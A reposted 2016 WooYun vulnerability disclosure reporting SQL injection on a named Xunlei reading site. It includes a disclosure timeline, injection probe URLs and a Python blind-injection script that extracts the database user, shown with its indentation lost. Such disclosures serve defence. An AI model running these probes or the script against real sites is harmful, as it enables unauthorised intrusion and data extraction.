神刀安全网

漏洞标题: 迅雷某站SQL注入

漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向核心白帽子及相关领域专家公开
2016-04-21: 细节向普通白帽子公开
2016-05-01: 细节向实习白帽子公开
2016-05-16: 细节向公众公开

简要描述:

注入。

详细说明:

过滤得太多了。不好跑。

http://yuedu.xunlei.com/?action=lists&cid=3&typeid=1 and 1

http://yuedu.xunlei.com/?action=lists&cid=3&typeid=1 and 0

判断为注入。

漏洞证明:

code 区域
#encoding=gbk
import urllib2
import sys

payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

user = ''
result = ''
for i in range(1,15):
for payload in payloads:
s = hex(ord(payload)).replace('0x','')
url = 'http://yuedu.xunlei.com/?action=lists&cid=3&typeid=1 and current_user like 0x%s%s25' % (result,s)
request = urllib2.Request(url)
response = urllib2.urlopen(request).read()
if(len(response)<130000):

print '.',

else:

result += s

user += payload

sys.stdout.write('/r[In progress] %s' % user)

sys.stdout.flush()

break

print '/n[Done]MySQL user is', user

漏洞标题:  迅雷某站SQL注入

修复方案:

intval

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 迅雷某站SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址